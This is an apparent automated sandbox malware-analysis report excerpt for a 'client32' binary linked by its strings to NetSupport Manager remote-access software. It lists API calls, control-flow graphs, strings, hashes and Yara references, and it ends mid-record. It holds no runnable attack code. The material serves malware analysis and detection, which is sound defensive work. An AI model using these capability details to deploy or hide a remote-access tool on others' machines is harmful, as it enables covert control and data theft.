                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
                                                                                  • DispatchMessageA.USER32(?), ref: 11030136
                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
                                                                                  • CloseHandle.KERNEL32(00000000,Function_000278D0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 110303D4
                                                                                  • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
                                                                                  • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
                                                                                  • SetWindowPos.USER32(0006040E,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 11030449
                                                                                  • CloseHandle.KERNEL32(00000000,1105A720,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 110304CA
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • wsprintfA.USER32 ref: 11030645
                                                                                    • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,50D94AA1,?,?,00000000), ref: 1112909A
                                                                                    • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
                                                                                    • Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
                                                                                  • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$648351$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                  • API String ID: 372548862-2744211200
                                                                                  • Opcode ID: ff6231982a083b7ef807ca73d3ddae56e174acd57833a54bc83ec0c4d0681142
                                                                                  • Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
                                                                                  • Opcode Fuzzy Hash: ff6231982a083b7ef807ca73d3ddae56e174acd57833a54bc83ec0c4d0681142
                                                                                  • Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56
                                                                                  Function 1102E0D0 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1187 1102e0d0-1102e120 call 111101b0 1190 1102e122-1102e136 call 11143630 1187->1190 1191 1102e138 1187->1191 1193 1102e13e-1102e183 call 11142e60 call 11143690 1190->1193 1191->1193 1199 1102e323-1102e332 call 11145990 1193->1199 1200 1102e189 1193->1200 1209 1102e338-1102e348 1199->1209 1201 1102e190-1102e193 1200->1201 1203 1102e195-1102e197 1201->1203 1204 1102e1b8-1102e1c1 1201->1204 1206 1102e1a0-1102e1b1 1203->1206 1207 1102e1c7-1102e1ce 1204->1207 1208 1102e2f4-1102e30d call 11143690 1204->1208 1206->1206 1212 1102e1b3 1206->1212 1207->1208 1214 1102e2c3-1102e2d8 call 11163ca7 1207->1214 1215 1102e1d5-1102e1d7 1207->1215 1216 1102e2da-1102e2ef call 11163ca7 1207->1216 1217 1102e26a-1102e29d call 11162777 call 11142e60 1207->1217 1218 1102e2ab-1102e2c1 call 11164ed0 1207->1218 1219 1102e25b-1102e265 1207->1219 1220 1102e29f-1102e2a9 1207->1220 1221 1102e21c-1102e222 1207->1221 1222 1102e24c-1102e256 1207->1222 1208->1201 1237 1102e313-1102e315 1208->1237 1210 1102e34a 1209->1210 1211 1102e34f-1102e363 call 1102d360 1209->1211 1210->1211 1233 1102e368-1102e36d 1211->1233 1212->1208 1214->1208 1215->1208 1227 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 1215->1227 1216->1208 1217->1208 1218->1208 1219->1208 1220->1208 1228 1102e224-1102e238 call 11163ca7 1221->1228 1229 1102e23d-1102e247 1221->1229 1222->1208 1227->1208 1228->1208 1229->1208 1240 1102e413-1102e42d call 11146fe0 1233->1240 1241 1102e373-1102e398 call 110b7df0 call 11147060 1233->1241 1237->1240 1244 1102e31b-1102e321 1237->1244 1254 1102e483-1102e48f call 1102bc40 1240->1254 1255 1102e42f-1102e448 call 1105e820 1240->1255 1263 1102e3a3-1102e3a9 1241->1263 1264 1102e39a-1102e3a1 1241->1264 1244->1199 1244->1209 1267 1102e491-1102e498 1254->1267 1268 1102e468-1102e46f 1254->1268 1255->1254 1266 1102e44a-1102e45c 1255->1266 1269 1102e3ab-1102e3b2 call 11028360 1263->1269 1270 1102e409 1263->1270 1264->1240 1266->1254 1283 1102e45e 1266->1283 1271 1102e475-1102e478 1267->1271 1273 1102e49a-1102e4a4 1267->1273 1268->1271 1272 1102e67a-1102e69b GetComputerNameA 1268->1272 1269->1270 1286 1102e3b4-1102e3e6 1269->1286 1270->1240 1276 1102e47a-1102e481 call 110b7df0 1271->1276 1277 1102e4a9 1271->1277 1278 1102e6d3-1102e6d9 1272->1278 1279 1102e69d-1102e6d1 call 11028230 1272->1279 1273->1272 1285 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 1276->1285 1277->1285 1281 1102e6db-1102e6e0 1278->1281 1282 1102e70f-1102e722 call 11164ed0 1278->1282 1279->1278 1309 1102e727-1102e733 1279->1309 1287 1102e6e6-1102e6ea 1281->1287 1303 1102e917-1102e93a 1282->1303 1283->1268 1334 1102e64a-1102e652 SetLastError 1285->1334 1335 1102e58c-1102e5a3 1285->1335 1298 1102e3f0-1102e3ff call 110f64d0 1286->1298 1299 1102e3e8-1102e3ee 1286->1299 1292 1102e706-1102e708 1287->1292 1293 1102e6ec-1102e6ee 1287->1293 1302 1102e70b-1102e70d 1292->1302 1300 1102e702-1102e704 1293->1300 1301 1102e6f0-1102e6f6 1293->1301 1306 1102e402-1102e404 call 1102d900 1298->1306 1299->1298 1299->1306 1300->1302 1301->1292 1308 1102e6f8-1102e700 1301->1308 1302->1282 1302->1309 1319 1102e962-1102e96a 1303->1319 1320 1102e93c-1102e942 1303->1320 1306->1270 1308->1287 1308->1300 1313 1102e735-1102e74a call 110b7df0 call 1102a1f0 1309->1313 1314 1102e74c-1102e75f call 11081d30 1309->1314 1341 1102e7a3-1102e7bc call 11081d30 1313->1341 1329 1102e761-1102e784 1314->1329 1330 1102e786-1102e788 1314->1330 1326 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 1319->1326 1327 1102e96c-1102e979 call 11036710 call 11162777 1319->1327 1320->1319 1324 1102e944-1102e95d call 1102d900 1320->1324 1324->1319 1327->1326 1329->1341 1339 1102e790-1102e7a1 1330->1339 1343 1102e613-1102e61f 1334->1343 1335->1343 1355 1102e5a5-1102e5ae 1335->1355 1339->1339 1339->1341 1362 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 1341->1362 1363 1102e8fc-1102e909 call 11164ed0 1341->1363 1348 1102e662-1102e671 1343->1348 1349 1102e621-1102e62d 1343->1349 1348->1272 1356 1102e673-1102e674 FreeLibrary 1348->1356 1353 1102e63f-1102e643 1349->1353 1354 1102e62f-1102e63d GetProcAddress 1349->1354 1360 1102e654-1102e656 SetLastError 1353->1360 1361 1102e645-1102e648 1353->1361 1354->1353 1355->1343 1359 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 1355->1359 1356->1272 1359->1343 1384 1102e5e8-1102e60e call 11147060 call 11027f80 1359->1384 1366 1102e65c 1360->1366 1361->1366 1399 1102e853-1102e869 call 11129e00 1362->1399 1400 1102e83f-1102e84e call 11029a70 1362->1400 1375 1102e90c-1102e911 CharUpperA 1363->1375 1366->1348 1375->1303 1384->1343 1404 1102e882-1102e8bc call 110d0e20 * 2 1399->1404 1405 1102e86b-1102e87d call 110d0e20 1399->1405 1400->1399 1412 1102e8d2-1102e8fa call 11164ed0 call 110d0a10 1404->1412 1413 1102e8be-1102e8cd call 11029a70 1404->1413 1405->1404 1412->1375 1413->1412
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _malloc_memsetwsprintf
                                                                                  • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/11/16 11:28:14 V12.10F20$648351$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                  • API String ID: 3802068140-3577953040
                                                                                  • Opcode ID: eeddba07d7e6520cef25e5c7574d70c0732ba69d7c4c0694e1ffbbd3a2b399ab
                                                                                  • Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
                                                                                  • Opcode Fuzzy Hash: eeddba07d7e6520cef25e5c7574d70c0732ba69d7c4c0694e1ffbbd3a2b399ab
                                                                                  • Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51
                                                                                  Function 6FA03D00 Relevance: 68.6, APIs: 11, Strings: 28, Instructions: 392COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1839 6fa03d00-6fa03d42 call 6fa11c50 call 6fa03b80 1843 6fa03d47-6fa03d4f 1839->1843 1844 6fa03d51-6fa03d6b call 6fa128e1 1843->1844 1845 6fa03d6c-6fa03d6e 1843->1845 1847 6fa03d70-6fa03d84 call 6f9f6f50 1845->1847 1848 6fa03d87-6fa03da1 call 6f9f8fb0 1845->1848 1847->1848 1854 6fa03da3-6fa03dc4 call 6f9f63c0 call 6fa128e1 1848->1854 1855 6fa03dc5-6fa03e44 call 6f9f5e90 * 2 call 6fa07be0 call 6f9f5e20 lstrlenA 1848->1855 1868 6fa03e46-6fa03e95 call 6fa0d8b0 call 6f9f5060 call 6f9f4830 call 6fa11bfd 1855->1868 1869 6fa03e98-6fa03fbe call 6f9f5500 call 6f9f6050 call 6fa07c70 * 2 call 6fa07d00 * 3 call 6f9f5060 call 6fa07d00 call 6fa11bfd call 6fa07d00 gethostname call 6fa07d00 call 6f9fb8e0 1855->1869 1868->1869 1904 6fa03fc0 1869->1904 1905 6fa03fc5-6fa03fe1 call 6fa07d00 1869->1905 1904->1905 1908 6fa03fe3-6fa03ff5 call 6fa07d00 1905->1908 1909 6fa03ff8-6fa03ffe 1905->1909 1908->1909 1911 6fa04004-6fa04022 call 6f9f5e20 1909->1911 1912 6fa0421a-6fa04263 call 6fa07b60 call 6fa11bfd call 6f9f98d0 call 6fa077e0 1909->1912 1919 6fa04024-6fa04057 call 6f9f5060 call 6fa07d00 call 6fa11bfd 1911->1919 1920 6fa0405a-6fa04084 call 6f9f5e20 1911->1920 1940 6fa04292-6fa042aa call 6fa128e1 1912->1940 1941 6fa04265-6fa04291 call 6f9fa4e0 call 6fa128e1 1912->1941 1919->1920 1929 6fa041d1-6fa04217 call 6fa07d00 call 6f9f5e20 call 6fa07d00 1920->1929 1930 6fa0408a-6fa041ce call 6f9f5060 call 6fa07d00 call 6fa11bfd call 6f9f5e20 call 6f9f5060 call 6fa07d00 call 6fa11bfd call 6f9f5e20 call 6f9f5060 call 6fa07d00 call 6fa11bfd call 6f9f5e20 call 6f9f5060 call 6fa07d00 call 6fa11bfd 1920->1930 1929->1912 1930->1929
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: *Dept$*Gsk$1.1$648351$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                  • API String ID: 2102423945-1719263116
                                                                                  • Opcode ID: da51b6b0265a493285fba39d4f561e1b49fe14d7c54678a75ddbeb147747c34c
                                                                                  • Instruction ID: 9bd5edf12af8e2b8587d26a9c76a9a3f37199746b2a1d7ab01113da4481ad58a
                                                                                  • Opcode Fuzzy Hash: da51b6b0265a493285fba39d4f561e1b49fe14d7c54678a75ddbeb147747c34c
                                                                                  • Instruction Fuzzy Hash: C5E16372C007286ACB25DB64ED80FEFB778AF55219F0085D5E509A6181DB38ABC58FE1
                                                                                  Function 11144140 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1980 11144140-11144181 GetModuleFileNameA 1981 111441c3 1980->1981 1982 11144183-11144196 call 11081e00 1980->1982 1984 111441c9-111441cd 1981->1984 1982->1981 1990 11144198-111441c1 LoadLibraryA 1982->1990 1986 111441cf-111441dc LoadLibraryA 1984->1986 1987 111441e9-11144207 GetModuleHandleA GetProcAddress 1984->1987 1986->1987 1991 111441de-111441e6 LoadLibraryA 1986->1991 1988 11144217-11144240 GetProcAddress * 4 1987->1988 1989 11144209-11144215 1987->1989 1992 11144243-111442bb GetProcAddress * 10 call 11162bb7 1988->1992 1989->1992 1990->1984 1991->1987 1994 111442c0-111442c3 1992->1994
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,762323A0), ref: 11144173
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                                  • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                                  • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                                  • GetModuleHandleA.KERNEL32(?), ref: 111441EA
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                                  • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                                  • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                                  • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                                  • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                                  • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                                  • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                                  • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                                  • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                    • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                  • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                  • API String ID: 3874234733-2061581830
                                                                                  • Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                  • Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
                                                                                  • Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                  • Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59
                                                                                  Function 110AA170 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2080 110aa170-110aa1d2 LoadLibraryA GetProcAddress 2081 110aa1d8-110aa1e9 SetupDiGetClassDevsA 2080->2081 2082 110aa2e5-110aa2ed SetLastError 2080->2082 2083 110aa1ef-110aa1fd 2081->2083 2084 110aa3f3-110aa3f5 2081->2084 2087 110aa2f9-110aa2fb SetLastError 2082->2087 2088 110aa200-110aa204 2083->2088 2085 110aa3fe-110aa400 2084->2085 2086 110aa3f7-110aa3f8 FreeLibrary 2084->2086 2089 110aa417-110aa432 call 11162bb7 2085->2089 2086->2085 2090 110aa301-110aa30c GetLastError 2087->2090 2091 110aa21d-110aa235 2088->2091 2092 110aa206-110aa217 GetProcAddress 2088->2092 2093 110aa312-110aa31d call 11163aa5 2090->2093 2094 110aa3a0-110aa3b1 GetProcAddress 2090->2094 2091->2090 2103 110aa23b-110aa23d 2091->2103 2092->2087 2092->2091 2093->2088 2097 110aa3bb-110aa3bd SetLastError 2094->2097 2098 110aa3b3-110aa3b9 SetupDiDestroyDeviceInfoList 2094->2098 2102 110aa3c3-110aa3c5 2097->2102 2098->2102 2102->2084 2104 110aa3c7-110aa3e9 CreateFileA 2102->2104 2105 110aa248-110aa24a 2103->2105 2106 110aa23f-110aa245 call 11163aa5 2103->2106 2109 110aa3eb-110aa3f0 call 11163aa5 2104->2109 2110 110aa402-110aa40c call 11163aa5 2104->2110 2107 110aa24c-110aa25f GetProcAddress 2105->2107 2108 110aa265-110aa27b 2105->2108 2106->2105 2107->2108 2113 110aa322-110aa32a SetLastError 2107->2113 2118 110aa27d-110aa286 GetLastError 2108->2118 2120 110aa28c-110aa29f call 11163a11 2108->2120 2109->2084 2121 110aa40e-110aa40f FreeLibrary 2110->2121 2122 110aa415 2110->2122 2113->2118 2118->2120 2123 110aa361-110aa372 call 110aa110 2118->2123 2130 110aa382-110aa393 call 110aa110 2120->2130 2131 110aa2a5-110aa2ad 2120->2131 2121->2122 2122->2089 2128 110aa37b-110aa37d 2123->2128 2129 110aa374-110aa375 FreeLibrary 2123->2129 2128->2089 2129->2128 2130->2128 2137 110aa395-110aa39e FreeLibrary 2130->2137 2133 110aa2af-110aa2c2 GetProcAddress 2131->2133 2134 110aa2c4-110aa2db 2131->2134 2133->2134 2136 110aa32f-110aa331 SetLastError 2133->2136 2138 110aa337-110aa351 call 110aa110 call 11163aa5 2134->2138 2141 110aa2dd-110aa2e0 2134->2141 2136->2138 2137->2089 2138->2128 2145 110aa353-110aa35c FreeLibrary 2138->2145 2141->2088 2145->2089
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(setupapi.dll,50D94AA1,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,111856D8), ref: 110AA1A3
                                                                                  • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110AA1C7
                                                                                  • SetupDiGetClassDevsA.SETUPAPI(111A7EDC,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF), ref: 110AA1E1
                                                                                  • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110AA20C
                                                                                  • _free.LIBCMT ref: 110AA240
                                                                                  • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA252
                                                                                  • GetLastError.KERNEL32 ref: 110AA27D
                                                                                  • _malloc.LIBCMT ref: 110AA293
                                                                                  • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA2B5
                                                                                  • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA2E7
                                                                                  • SetLastError.KERNEL32(00000078), ref: 110AA2FB
                                                                                  • GetLastError.KERNEL32 ref: 110AA301
                                                                                  • _free.LIBCMT ref: 110AA313
                                                                                  • SetLastError.KERNEL32(00000078), ref: 110AA324
                                                                                  • SetLastError.KERNEL32(00000078), ref: 110AA331
                                                                                  • _free.LIBCMT ref: 110AA344
                                                                                  • FreeLibrary.KERNEL32(?,?), ref: 110AA354
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA3F8
                                                                                  Strings
                                                                                  Memory Dump Source
